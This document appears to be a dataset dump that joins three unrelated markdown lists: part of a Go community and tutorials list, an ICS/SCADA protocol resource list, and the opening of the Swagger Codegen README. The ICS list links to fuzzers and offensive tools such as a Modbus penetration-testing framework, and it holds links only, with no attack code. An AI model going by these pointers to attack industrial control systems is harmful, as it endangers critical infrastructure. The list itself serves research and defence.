[CodinGame](https://www.codingame.com/) - Learn Go by solving interactive tasks using small games as practical examples.\n- [Explore Go Libraries & Projects](https://kandi.openweaver.com/explore/go) - Discover & find a curated list of popular & new Go libraries, top authors, trending project kits, discussions, tutorials & learning resources on kandi.\n- [Go Blog](https://blog.golang.org) - The official Go blog.\n- [Go Code Club](https://www.youtube.com/watch?v=nvoIPQYdx9g&list=PLEcwzBXTPUE_YQR7R0BRtHBYJ0LN3Y0i3) - A group of Gophers read and discuss a different Go project every week.\n- [Go Community on Hashnode](https://hashnode.com/n/go) - Community of Gophers on Hashnode.\n- [Go Forum](https://forum.golangbridge.org) - Forum to discuss Go.\n- [Go Projects](https://github.com/golang/go/wiki/Projects) - List of projects on the Go community wiki.\n- [Go Proverbs](https://go-proverbs.github.io/) - Go Proverbs by Rob Pike.\n- [Go Report Card](https://goreportcard.com) - A report card for your Go package.\n- [go.dev](https://go.dev/) - A hub for Go developers.\n- [gocryforhelp](https://github.com/ninedraft/gocryforhelp) - Collection of Go projects that needs help. Good place to start your open-source way in Go.\n- [godoc.org](https://godoc.org/) - Documentation for open source Go packages.\n- [Golang Developer Jobs](https://golangjob.xyz) - Developer Jobs exclusively for Golang related Roles.\n- [Golang Flow](https://golangflow.io) - Post Updates, News, Packages and more.\n- [Golang News](https://golangnews.com) - Links and news about Go programming.\n- [Golang Resources](https://golangresources.com) - A curation of the best articles, exercises, talks and videos to learn Go.\n- [Golang Weekly](https://discu.eu/weekly/golang/) - Each monday projects, tutorials and articles about Go.\n- [golang-graphics](https://github.com/mholt/golang-graphics) - Collection of Go images, graphics, and art.\n- [golang-nuts](https://groups.google.com/forum/#!forum/golang-nuts) - Go mailing list.\n- [Google Plus Community](https://plus.google.com/communities/114112804251407510571) - The Google+ community for #golang enthusiasts.\n- [Gopher Community Chat](https://invite.slack.golangbridge.org) - Join Our New Slack Community For Gophers ([Understand how it came](https://blog.gopheracademy.com/gophers-slack-community/)).\n- [Gophercises](https://gophercises.com/) - Free coding exercises for budding gophers.\n- [gowalker.org](https://gowalker.org) - Go Project API documentation.\n- [json2go](https://m-zajac.github.io/json2go) - Advanced JSON to Go struct conversion - online tool.\n- [justforfunc](https://www.youtube.com/c/justforfunc) - Youtube channel dedicated to Go programming language tips and tricks, hosted by Francesc Campoy [@francesc](https://twitter.com/francesc).\n- [Learn Go Programming](https://blog.learngoprogramming.com) - Learn Go concepts with illustrations.\n- [Made with Golang](https://madewithgolang.com/?ref=awesome-go)\n- [r/Golang](https://www.reddit.com/r/golang) - News about Go.\n- [studygolang](https://studygolang.com) - The community of studygolang in China.\n- [Trending Go repositories on GitHub today](https://github.com/trending?l=go) - Good place to find new Go libraries.\n- [TutorialEdge - Golang](https://tutorialedge.net/course/golang/)\n\n**[⬆ back to top](#contents)**\n\n### Tutorials\n\n- [50 Shades of Go](https://devs.cloudimmunity.com/gotchas-and-common-mistakes-in-go-golang/) - Traps, Gotchas, and Common Mistakes for New Golang Devs.\n- [A Comprehensive Guide to Structured Logging in Go](https://betterstack.com/community/guides/logging/logging-in-go/) - Delve deep into the world of structured logging in Go with a specific focus on recently accepted slog proposal which aims to bring high performance structured logging with levels to the standard library.\n- [A Guide to Golang E-Commerce](https://snipcart.com/blog/golang-ecommerce-ponzu-cms-demo?utm_term=golang-ecommerce-ponzu-cms-demo) - Building a Golang site for e-commerce (demo included).\n- [A Tour of Go](https://tour.golang.org/) - Interactive tour of Go.\n- [Build a Database in 1000 lines of code]( https://link.medium.com/O9YQlx89Htb) - Build a NoSQL Database From Zero in 1000 Lines of Code.\n- [Build web application with Golang](https://github.com/astaxie/build-web-application-with-golang) - Golang ebook intro how to build a web app with golang.\n- [Building and Testing a REST API in Go with Gorilla Mux and PostgreSQL](https://semaphoreci.com/community/tutorials/building-and-testing-a-rest-api-in-go-with-gorilla-mux-and-postgresql) - We’ll write an API with the help of the powerful Gorilla Mux.\n- [Building Go Web Applications and Microservices Using Gin](https://semaphoreci.com/community/tutorials/building-go-web-applications-and-microservices-using-gin) - Get familiar with Gin and find out how it can help you reduce boilerplate code and build a request handling pipeline.\n- [Caching Slow Database Queries](https://medium.com/@rocketlaunchr.cloud/caching-slow-database-queries-1085d308a0c9) - How to cache slow database queries.\n- [Canceling MySQL](https://medium.com/@rocketlaunchr.cloud/canceling-mysql-in-go-827ed8f83b30) - How to cancel MySQL queries.\n- [CodeCrafters Golang Track](https://app.codecrafters.io/tracks/go) - Achieve mastery in advanced Go by building your own Redis, Docker, Git, and SQLite. Featuring goroutines, systems programming, file I/O, and more.\n- [Debugged.it Go patterns](https://github.com/haveyoudebuggedit/go-patterns) - Advanced Go patterns with ready-to-run examples.\n- [Design Patterns in Go](https://github.com/shubhamzanwar/design-patterns) - Collection of programming design patterns implemented in Go.\n- [Ethereum Development with Go](https://github.com/miguelmota/ethereum-development-with-go-book) - A little e-book on Ethereum Development with Go.\n- [Games With Go](https://www.youtube.com/watch?v=9D4yH7e_ea8&list=PLDZujg-VgQlZUy1iCqBbe5faZLMkA3g2x) - A video series teaching programming and game development.\n- [Go By Example](https://gobyexample.com/) - Hands-on introduction to Go using annotated example programs.\n- [Go Cheat Sheet](https://github.com/a8m/go-lang-cheat-sheet) - Go's reference card.\n- [Go database/sql tutorial](http://go-database-sql.org/) - Introduction to database/sql.\n- [Go in 7 days](https://github.com/harrytran103/7_days_of_go) - Learn everything about Go in 7 days (from a Nodejs developer).\n- [Go Language Tutorial](https://www.javatpoint.com/go-tutorial) - Learn Go language Tutorial.\n- [Go Tutorial](https://www.tutorialspoint.com/go/index.htm) - Learn Go programming.\n- [Go WebAssembly Tutorial - Building a Simple Calculator](https://tutorialedge.net/golang/go-webassembly-tutorial/)\n- [go-clean-template](https://github.com/evrone/go-clean-template) - Clean Architecture template for Golang services.\n- [go-patterns](https://github.com/tmrts/go-patterns) - Curated list of Go design patterns, recipes and idioms.\n- [goapp](https://github.com/bnkamalesh/goapp) - An opinionated guideline to structure & develop a Go web application/service.\n- [Golang for Node.js Developers](https://github.com/miguelmota/golang-for-nodejs-developers) - Examples of Golang compared to Node.js for learning.\n- [Golang Tutorial Guide](https://www.freecodecamp.org/news/golang-tutorial-list-free-courses-learn-go-programming-language/) - A List of Free Courses to Learn the Go Programming Language.\n- [Golangbot](https://golangbot.com/learn-golang-series/) - Tutorials to get started with programming in Go.\n- [GopherCoding](https://gophercoding.com/) - Collection of code snippets and tutorials to help tackle every day issues.\n- [GopherSnippets](https://gophersnippets.com/) - Code snippets with tests and testable examples for the Go programming language.\n- [Gosamples](https://gosamples.dev/) - Collection of code snippets that let you solve everyday code problems.\n- [Hackr.io](https://hackr.io/tutorials/learn-golang) - Learn Go from the best online golang tutorials submitted & voted by the golang programming community.\n- [Hex Monscape](https://github.com/Haraj-backend/hex-monscape) - Getting started guidelines in writing maintainable code using Hexagonal Architecture.\n- [How to Benchmark: dbq vs sqlx vs GORM](https://medium.com/@rocketlaunchr.cloud/how-to-benchmark-dbq-vs-sqlx-vs-gorm-e814caacecb5) - Learn how to benchmark in Go. As a case-study, we will benchmark dbq, sqlx and GORM.\n- [How To Deploy a Go Web Application with Docker](https://semaphoreci.com/community/tutorials/how-to-deploy-a-go-web-application-with-docker) - Learn how to use Docker for Go development and how to build production Docker images.\n- [How to Use Godog for Behavior-driven Development in Go](https://semaphoreci.com/community/tutorials/how-to-use-godog-for-behavior-driven-development-in-go) - Get started with Godog — a Behavior-driven development framework for building and testing Go applications.\n- [Learn Go with 1000+ Exercises](https://github.com/inancgumus/learngo) - Learn Go with thousands of examples, exercises, and quizzes.\n- [Learn Go with TDD](https://github.com/quii/learn-go-with-tests) - Learn Go with test-driven development.\n- [Learning Go by examples](https://dev.to/aurelievache/learning-go-by-examples-introduction-448n) - Series of articles in order to learn Golang language by concrete applications as example.\n- [Microservices with Go](https://www.youtube.com/playlist?list=PLmD8u-IFdreyh6EUfevBcbiuCKzFk0EW_) - Dive deep into building microservices using Go, including gRPC.\n- [package main](https://www.youtube.com/packagemain) - YouTube channel about Programming in Go.\n- [Programming with Google Go](https://www.coursera.org/specializations/google-golang) - Coursera Specialization to learn about Go from scratch.\n- [Saving a Third of Our Memory by Re-ordering Go Struct Fields](https://qvault.io/golang/struct-field-ordering-memory/) - How inefficient field ordering in Go structs.\n- [Scaling Go Applications](https://betterstack.com/community/guides/scaling-go/) - Everything about building, deploying and scaling Go applications in production.\n- [The world’s easiest introduction to WebAssembly with Golang](https://medium.com/@martinolsansky/webassembly-with-golang-is-fun-b243c0e34f02)\n- [W3basic Go Tutorials](https://www.w3basic.com/golang/) - W3Basic provides an in-depth tutorial and well-organized content to learn Golang programming.\n- [Working with Go](https://github.com/mkaz/working-with-go) - Intro to go for experienced programmers.\n- [Your basic Go](https://yourbasic.org/golang) - Huge collection of tutorials and how to's.\n\n**[⬆ back to top](#contents)**\n\n### Guided Learning\n\n- [The Go Developer Roadmap](https://roadmap.sh/golang) - A visual roadmap that new Go developers can follow through to help them learn Go.\n- [The Go Learning Path](https://tutorialedge.net/paths/golang/) - A guided learning path containing a mix of free and premium resources.\n\n**[⬆ back to top](#contents)**\n"}}},{"rowIdx":323,"cells":{"text":{"kind":"string","value":"# ICS Protocols\n\nDeveloped as a community asset\n\n## General / Miscellaneous Releases\n\n- [ICS System Ports List](PORTS.md) - This is a list of common ICS tcp/udp ports.\n- [PoC 2013 SCADA Release](https://github.com/atimorin/PoC2013) - Power of Community 2013 conference special release of ICS/SCADA toolkit\n- [Industrial Control Systems Network Protocol Parsers (ICSNPP)](https://github.com/cisagov/ICSNPP) - DHS CISA Industrial Control Systems protocol parsers plugins for the Zeek network security monitoring framework\n- [Triangle Microworks DTM](https://www.trianglemicroworks.com/products/testing-and-configuration-tools/dtm-pages/overview) - Distributed Test Manager (DTM) is a Windows® application that can simulate the SCADA communications in the substation and perform automated tests to confirm system or individual device behavior. **commercial**\n- [Awesome Industrial Protocols](https://github.com/Orange-Cyberdefense/awesome-industrial-protocols) - Offensive security-oriented list of industrial network protocols resources, by Orange Cyberdefense Team.\n\n## AMI\n\n- [C1218 Termineter](https://github.com/GrayHatLabs/john_commor_c1218) - c1218 powermeter emulator\n- [Newer Termineter](https://github.com/rsmusllp/termineter) - Smart Meter Security Testing Framework\n- [Kamstrup Meter Protocol (KMP)](https://github.com/johnnykv/PyKamstrup) - TCP/IP Kamstrup Meter Protocol (KMP) implementation\n\n## BACnet\n\n### Protocol Implementation\n- [Public Review of ASHRAE Standards](https://www.ashrae.org/technical-resources/standards-and-guidelines/read-only-versions-of-ashrae-standards) - A way to read some of the ASRAE standards that are out for public review.\n- [BACpypes](https://github.com/JoelBender/bacpypes) - BACpypes provides a BACnet application layer and network layer written in Python for daemons, scripting, and graphical interfaces.\n- [BACnet SC Reference Implementation](https://sourceforge.net/projects/bacnet-sc-reference-stack/) - BACnet Secure Connect Reference Implementation. More details about the standard [here](https://www.ashrae.org/file%20library/technical%20resources/bookstore/bacnet-sc-whitepaper-v15_final_20190521.pdf). Wireshark dissector docs [here](https://www.wireshark.org/docs/dfref/b/bscvlc.html)\n- [BACnet Stack](https://github.com/bacnet-stack/bacnet-stack) - C stack for BACnet\n\n### Protocol Parsers\n- [zeek plugin bacnet](https://github.com/amzn/zeek-plugin-bacnet) - BACnet Zeek Plugin from Amazon\n- [yet another zeek plugin bacnet](https://github.com/delta-2-4/Zeek-BACnetIP) - BACnet Zeek Plugin by Aaron Heller + [SANS whitepaper](https://www.sans.org/reading-room/whitepapers/ICS/paper/39240)\n- [ICSNPP Bacnet for Zeek](https://github.com/cisagov/icsnpp-bacnet) - DHS CISA Bacnet parser for Zeek\n\n### Fuzzing\n- [Fuzzowski](https://github.com/nccgroup/fuzzowski/tree/master) - partially implemented BACnet fuzzing\n\n## Bristol Standard Asynchronous Protocol (BSAP)\n\n- [ICSNPP BSAP IP for Zeek](https://github.com/cisagov/icsnpp-bsap) - DHS CISA BSAP plugin for Zeek\n\n## DNP3\n\n### Protocol Implementation\n\n- [OpenDNP3](https://github.com/automatak/dnp3) - Opendnp3 is the de facto reference implementation of IEEE-1815 (DNP3) provided under the Apache License.\n- [pydnp3 wrapper](https://github.com/ChargePoint/pydnp3) - Python wrapper for opendnp3\n- [DNP3 Simulator](https://github.com/automatak/dnp3-simulator) - Graphical DNP3 Master/Outstation simulator\n- [PIFaceRTU](https://github.com/automatak/pifacertu) - Opendnp3 running on a Raspberry Pi with Piface I/O board\n- [LangSec DNP3 Parser](https://github.com/Dartmouth-Trustlab/dnp3) - Parsing DNP3 using parser combinators in C.\n- [Proxyd](https://github.com/Dartmouth-Trustlab/proxy) - TCP Proxy for testing hammer based parsers (such as the DNP3 parser above)\n- [ICSNPP DNP3 for Zeek](https://github.com/cisagov/icsnpp-dnp3) - DHS CISA DNP3 logging extensions to Zeek\n- [dnp3 - rust implementation](https://github.com/stepfunc/dnp3) - Rust implementation of DNP3 (IEEE 1815) with idiomatic bindings for C, .NET, and Java\n\n### Traffic Generation\n\n- [DNP3 Traffic Generation](https://github.com/iti/ics-trafficgen/) - OpenDNP3-based traffic generation that can take a profile of traffic, apply scriptable variation, and result in output of DNP3 traffic matching that profile.\n- [DNP3Crafter](https://github.com/hpcn-uam/DNP3Crafter) - DNP3Crafter is a very simple Python script which use sockets to send precalculated DNP3 packets over TCP and allows you to choose the number of repetitions. It's use is designed for testing purposes.\n\n### Fuzzing\n\n- [AEGIS Fuzzer](https://www.automatak.com/aegis/) - Aegis™ is a smart fuzzing framework for a growing number of protocols that can identify robustness and security issues in communications software before it is deployed in a production system. **[commercial]** Early Open Source version is mirrored here: [Open-Source](/tools/mirrored/aegis-opensource/).\n- [ICSFuzz](https://github.com/momalab/ICSFuzz) - an PLC-side fuzzing tool for uncovering vulnerabilities in ICS control applications.\n\n## Ethercat\n\n- [ICSNPP Ethercat for Zeek](https://github.com/cisagov/icsnpp-ethercat) - DHS CISA Ethercat plugin for Zeek\n\n## Ethernet/IP and CIP\n\n- [EtherNet/IP+CIP dissector for Scapy](https://github.com/scy-phy/scapy-cip-enip) - a Python library which can be used to interact with components of a network using ENIP (Ethernet/IP) and CIP (Common Industrial Protocol) protocols. It uses scapy to implement packet dissectors which are able to decode a part of the network traffic. These dissectors can also be used to craft packets, which allows directly communicating with the PLCs (Programmable Logic Controllers) of the network. [Use case](https://labs.mwrinfosecurity.com/blog/offensive-ics-exploitation-a-technical-description/)\n- [Scapy implementation of DLR (Device Level Ring) protocol](https://github.com/scy-phy/scapy-dlr)\n- [Zeek implementation for ethernet/ip](https://github.com/scy-phy/bro-cip-enip) - This repository contains the necessary files in order to inspect Ethernet/IP and Common Industrial Protocol packets with Zeek.\n- [CPPPO - Communications Protocol Python Parser and Originator (EtherNet/IP CIP implementation)](https://github.com/pjkundert/cpppo) - Cpppo is used to implement binary communications protocol parsers. The protocol’s communication elements are described in terms of state machines which change state in response to input events, collecting the data and producing output data artifacts.\n- [pycomm](https://github.com/ruscito/pycomm) - **pycomm** is a package that includes a collection of modules used to communicate with PLCs. At the moment the first module in the package is **ab_comm**. **ab_comm** is a module that contains a set of classes used to interface Rockwell PLCs using Ethernet/IP protocol. The \"clx\" class can be used to communicate with Compactlogix, Controllogix PLCs The \"slc\" can be used to communicate with Micrologix or SLC PLCs\n- [pycomm3](https://github.com/ottowayi/pycomm3) - A Python Ethernet/IP library for communicating with Allen-Bradley PLCs.\n- [pyCIP](https://github.com/cpchrispye/PyCIP) - CIP protocol implementation in Python3\n- [zeek plugin enip](https://github.com/amzn/zeek-plugin-enip) - EthernetIP Zeek Plugin from Amazon\n- [ICSNPP ENIP and CIP for Zeek](https://github.com/cisagov/icsnpp-enip) - DHS CISA ENIP and CIP plugin for Zeek\n- [Molex EtherNet/IP Tool](https://www.molex.com/mx_upload/superfamily/iccc/EtherNet_IPTool.html) - The EtherNet/IP tool (EIPTool) is a small and simple helper tool which assists to explore CIP objects of EtherNet/IP nodes, without having any EDS files. It uses the explicit messaging to read and write CIP attributes.\n- [Claroty ENIP / CIP Stack Detector](https://github.com/claroty/enip-stack-detector) - EtherNet/IP & CIP Stack Detector that can help both cyber-security researchers, OT engineers, and asset owners to identify devices that are running a specific EtherNet/IP protocol stack.\n\n## Genisys\n- [ICSNPP Genisys for Zeek](https://github.com/cisagov/icsnpp-genisys) - DHS CISA Genisys plugin for Zeek\n\n## IEC 104\n\n- [IEC Server](/tools/mirrored/iec-server/) - Software to simulate server side of systems using a telecontrol message Protocol specified in the IEC 60870-5. Original website http://area-x1.lima-city.de is down, so this has been mirrored.\n- [OpenMRTS](https://sourceforge.net/projects/mrts/) - MRTS is an attempt to create open source IEC 870-5-101/104 based components for telecontrol and supervisory systems and to become a complete solution in future.\n- [QTester104](https://sourceforge.net/projects/qtester104/) - This software implements the IEC60870-5-104 protocol (client side) for substation data acquisition and control via tcp/ip network using the QT UI Framework. It can be compiled on Linux and Windows platforms. It's possible to poll and view data from the substation system (RTU/concentrator) and also send commands.\n- [lib60870](https://github.com/mz-automation/lib60870) - Implements IEC 60870-5-104 protocol.\n\n## IEC 61850\n\n### Protocol Implementation\n\n- [libIEC61850](http://libiec61850.com/libiec61850/) - open source library for IEC 61850.\n- [rapid61850](https://github.com/stevenblair/rapid61850) - Rapid-prototyping protection and control schemes with IEC 61850\n\n### Tools\n\n- [IEDScout](https://www.omicronenergy.com/en/products/all/secondary-testing-calibration/iedscout/noc/1/) - IEDScout provides access to 61850-based IEDs and can simulate entire Ed. {1,2} IEDs. Specifically, IEDScout lets you look inside the IED and at its communication. All data modeled and exchanged becomes visible and accessible. Additionally, IEDScout serves numerous useful tasks, which could otherwise only be performed with dedicated engineering tools or even a functioning master station. IEDScout shows an overview representing the typical workflow of commissioning, but also provides detailed information upon request. **[commercial]** Free 30 day evaluation license.\n- [Goose-Stalker](https://github.com/cutaway-security/goosestalker) - Goose-Stalker is a project to analyze and interact with Ethernet types associated with IEC 61850. Currently, the project is focused on Ethernet type 0x88b8 as published by the goose-IEC61850-scapy. The project has morphed significantly and the direction is to progress this even further.\n\n### Traffic Generation\n\n- [IEC 61850 Toolchain](https://github.com/smartgridadsc/IEC61850ToolChain) - This toolchain aims to enable users (e.g., power grid operators) to easily create customized datasets for the validation of cybersecurity solutions for IEC 61850 communication-based substations. This toolchain processes different inputs (e.g., substation configurations, attack configurations, and simulation settings) and carries out the necessary processing steps needed for generating the customized datasets. This toolchain is basing on an open source project libIEC61850.\n\n## IEEE C37.118\n\n### Protocol Implementation\n\n- [C37.118-2005 Spec](https://ieeexplore.ieee.org/document/1611105/) -- C37.118-2005 (deprecated). Note, this is a paid IEEE spec\n- [C37.118-2011 Spec](https://ieeexplore.ieee.org/document/6111219/) -- C37.118-2011 (current). Note, this is a paid IEEE spec\n- [pyMU](https://github.com/iti/pymu) - Python C37.118-2011 parser\n- [pyPMU](https://github.com/iicsys/pypmu) - WIP Python implementation\n- [Wireshark Dissector](https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-synphasor.c) - Implemented C37.118 wireshark dissector\n- [Grid Solutions Framework C37.118](https://github.com/GridProtectionAlliance/gsf/tree/master/Source/Libraries/GSF.PhasorProtocols/IEEEC37_118) - GSF implementation (.net)\n- [LangSec C37.118 Parser](https://github.com/Dartmouth-Trustlab/C37.118PMU) - LangSec based C37.118 parser\n- [ICSNPP Synchrophasor parser for Zeek](https://github.com/cisagov/icsnpp-synchrophasor) - DHS CISA C37.118 parser for Zeek\n\n### Tools\n\n- [pyMU](https://github.com/iti/pymu) - Python C37.118-2011 parser\n- [pyPMU](https://github.com/iicsys/pypmu) - WIP Python implementation\n- [PMU Connection Tester](https://github.com/GridProtectionAlliance/PMUConnectionTester) - Full fledged PMU connection tester, speaking c37.118 amongst many other synchrophasor protocols\n\n## LoRaWAN\n\n### Tools\n\n- [chirpotle](https://github.com/seemoo-lab/chirpotle) - A LoRaWAN Securiy Evaluation Framework\n\n## Modbus\n\n### Protocol Implementation\n\n- [pyModBus](https://github.com/bashwork/pymodbus) - A full modbus protocol written in python.\n- [Go modbus](https://github.com/things-go/go-modbus) - modbus write in pure go, support rtu,ascii,tcp master library,also support tcp slave.\n- [Modbus for Go](https://github.com/goburrow/modbus) - Fault-tolerant implementation of modbus protocol in Go (golang)\n- [ModbusPal](http://modbuspal.sourceforge.net) - ModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy to use interface with the capabilities to reproduce complex and realistic MODBUS environments. Mirror available [here](/tools/mirrored/modbuspal/).\n- [SMOD](/tools/mirrored/smod/) - MODBUS Penetration Testing Framework. smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. (mirrored as original source is now gone)\n- [mbtget](https://github.com/sourceperl/mbtget) - A simple modbus/TCP client write in pure Perl.\n- [ICSNPP Modbus for Zeek](https://github.com/cisagov/icsnpp-modbus) - DHS CISA Modbus extensions to logging for Zeek\n- [rodbus](https://github.com/stepfunc/rodbus) - Rust implementation of Modbus with idiomatic bindings for C, C++, .Net, and Java\n\n### Traffic Generation\n\n- [Modbus Traffic Generation](https://github.com/iti/ics-trafficgen/) - pyModbus-based traffic generation that can take a profile of traffic, apply scriptable variation, and result in output of Modbus traffic matching that profile.\n\n### Fuzzing\n\n- [AEGIS Fuzzer](https://www.automatak.com/aegis/) - Aegis™ is a smart fuzzing framework for a growing number of protocols that can identify robustness and security issues in communications software before it is deployed in a production system. **[commercial]** Early Open Source version is mirrored here: [Open-Source](/tools/mirrored/aegis-opensource).\n- [Modbus Fuzzer](https://github.com/bl4ckic3/Modbus-Fuzzer) - Modbus Protocol Fuzzer\n- [Modbus network fuzzer](https://github.com/s-e-knudsen/Modbus_network_fuzzer) - The modbus network fuzzer uses Boofuzz for the fuzzing of the protocol (By Søren Knudsen)\n- [Fuzzowski](https://github.com/nccgroup/fuzzowski/tree/master) - partially implemented Modbus fuzzing\n\n## Multispeak\n\n### Protocol Implementation\n\n- [Multispeak](https://github.com/saberdaagi/multispeak) - Implementation of multispeak protocol.\n- [Simple-Mutlispeak](https://github.com/eau-claire-energy-cooperative/simple-multispeak) - a simple, extendable, interface for communicating with a webservice implementing the Multispeak Standard.\n- [MS-SPEAK](https://github.com/pnnl/ms-speak) - Multi-Speak - Secure Protocol Enterprise Access Kit. Note, check the [Phase 3](https://github.com/pnnl/ms-speak/tree/Phase3) branch for more current development.\n\n## OPC UA\n\n### Protocol Implementation\n\n- [OPC UA .Net Standard](https://github.com/OPCFoundation/UA-.NETStandard) - Official OPC UA .Net Standard Stack and Samples from the OPC Foundation\n- [OPC UA Client GUI](https://github.com/FreeOpcUa/opcua-client-gui) - A simple OPC-UA GUI client.\n- [OPC UA Server Simulator](https://integrationobjects.com/opc-products/opc-unified-architecture/opc-ua-server-simulator/) - Simulate real-time and historical data using OPC UA Server Simulator.\n- [OPC UA Server and Client C++ Libraries](https://github.com/FreeOpcUa/freeopcua) - LGPL OPC-UA server and client library written in C++ and with a lot of code auto-generated from xml specification using python.\n- [ICSNPP OPC-UA Binary parser for Zeek](https://github.com/cisagov/icsnpp-opcua-binary) - DHS CISA OPC UA Binary protocol parser for Zeek\n\n## OpenADR\n\n### Protocol Implementation / Tools\n\n- [OpenADR 2.0a VEN Python](https://github.com/EnerNOC/oadr2-ven-python) - EnerNOC Open Source Python OpenADR 2.0a VEN client implementation\n- [EPRI OpenADR VTN Implementation](https://github.com/epri-dev/OpenADR-Virtual-Top-Node) - OpenADR 2.0 Profile Specification B Profile for virtual top node implementation.\n- [OpenADR Java Implementation](https://github.com/avob/OpenADR) - OpenADR minimal VEN / VTN 2.0a / 2.0b skeleton implementations in Java\n- [Node-Red Implementation](https://github.com/Argonne-National-Laboratory/node-red-contrib-oadr-ven) - Node-Red OADR2 VEN Implementation w/ HTTP transport\n\n## PROFINET\n\n### Protocol Implementation\n\n- [Profinet - Python](https://github.com/devkid/profinet) - Simple PROFINET implementation in python\n- [Profinet - C](https://github.com/kprovost/libs7comm) - PROFINET implementation in C\n- [Profinet Explorer](https://sourceforge.net/projects/profinetexplorer/) - Simple PROFINET explorer written in C#\n- [zeek plugin Profinet](https://github.com/amzn/zeek-plugin-profinet) - PROFINET Zeek Plugin from Amazon\n- [PROFINET GSD Checker](https://www.profibus.com/download/profinet-gsd-checker/) - Free tool to show and edit the content of GSD files for PROFINET in an easy to understand table view. It also contains a function to check the accuracy of GSD files which helps to build a valid description file.\n\n### Fuzzing\n\n- [ProFuzz](https://github.com/HSASec/ProFuzz) - Simple PROFINET fuzzer based on Scapy\n\n## SEL Fast Message\n\n- [Wireshark Dissector - SEL Fast Message](https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-selfm.c) - Wireshark Dissector for SEL Fast Message\n- [Grid Solutions Framework SEL Fast Message](https://github.com/GridProtectionAlliance/gsf/tree/master/Source/Libraries/GSF.PhasorProtocols/SelFastMessage) - GSF implementation (.net)\n- [SEL Applications Guides](https://www.selinc.com) - Look up AG95-10 and AG2002-14 product codes.\n- [SELProtoPy](https://github.com/engineerjoe440/selprotopy) - Schweitzer Engineering Laboratories (SEL) Protocol Bindings in Python. Implements SEL Fast Meter, Fast Message, and Fast Operate.\n\n## Siemens S7\n\n- [Snap7](http://snap7.sourceforge.net/) - open source Siemens S7 communication library.\n- [LibNoDave](http://libnodave.sourceforge.net/) - Another (less complete) open source communication library for the S7 protocol.\n- [S7comm](http://sourceforge.net/projects/s7commwireshark/) - open source Wireshark dissector plugin for the Siemens S7 protocol.\n- [Python Snap7 Wrapper](https://github.com/gijzelaerr/python-snap7) - A Python wrapper for the snap7 PLC communication library\n- [Zeek-IDS S7 Protocol Parser](https://github.com/dw2102/S7Comm-Analyzer) - S7 protocol parser for Zeek IDS\n- [zeek plugin s7](https://github.com/amzn/zeek-plugin-s7comm) - S7 Zeek Plugin from Amazon\n- [SPPA S7 Data port dissector](https://github.com/klsecservices/SPPA/blob/master/sppa_dissector.lua) - SPPA-T3000 Automation server (PLC) dissector + [whitepaper](https://github.com/klsecservices/SPPA/blob/master/Security%20of%20DCS%20for%20turbines%20-%202020.pdf) by Kaspersky Security Services team\n- [ICSNPP S7comm parser for Zeek](https://github.com/cisagov/icsnpp-s7comm) - DHS CISA S7comm parser for Zeek\n\n## SSP21\n\n- [SSP21 - Specification](https://github.com/ssp21/ssp21-spec) - SSP21 specification\n- [SSP21 - C++](https://github.com/ssp21/ssp21-spec) - SSP21 reference implementation in C++\n- [SSP21 - Rust](https://github.com/ssp21/ssp21-rs-core) - SSP21 core library in Rust\n\n## TriStation\n\n- [FireEye TriStation Wireshark Dissector](https://github.com/stvemillertime/TriStation) - reverse engineered wireshark dissector from Mandiant/FireEye team after Triton discovery.\n- [Nozomi TriStation Wireshark Dissector](https://github.com/NozomiNetworks/tricotools) - another TriStation dissector, this time from Nozomi, also incldues pcap, and basic honeypot simulator.\n\n## Zigbee\n\n- [Killerbee](https://github.com/riverloopsec/killerbee) - IEEE 802.15.4/ZigBee Security Research Toolkit.\n\n## General Protocol Fuzzing\n\n- [AFL](http://lcamtuf.coredump.cx/afl/) - American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.\n\n- [WinAFL](https://github.com/ivanfratric/winafl) - AFL that works for Windows binaries.\n\n(creative commons license)\n"}}},{"rowIdx":324,"cells":{"text":{"kind":"string","value":"# Swagger Code Generator\n\n- Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)\n[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)\n[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)\n[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)\n- 3.0.0: [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/3.0.0.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)\n[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea/3.0.0.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)\n[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=3.0.0&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)\n[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen/tree/3.0.0.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)\n\n\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)\n[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)\n\n:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:\n\n:notebook_with_decorative_cover: 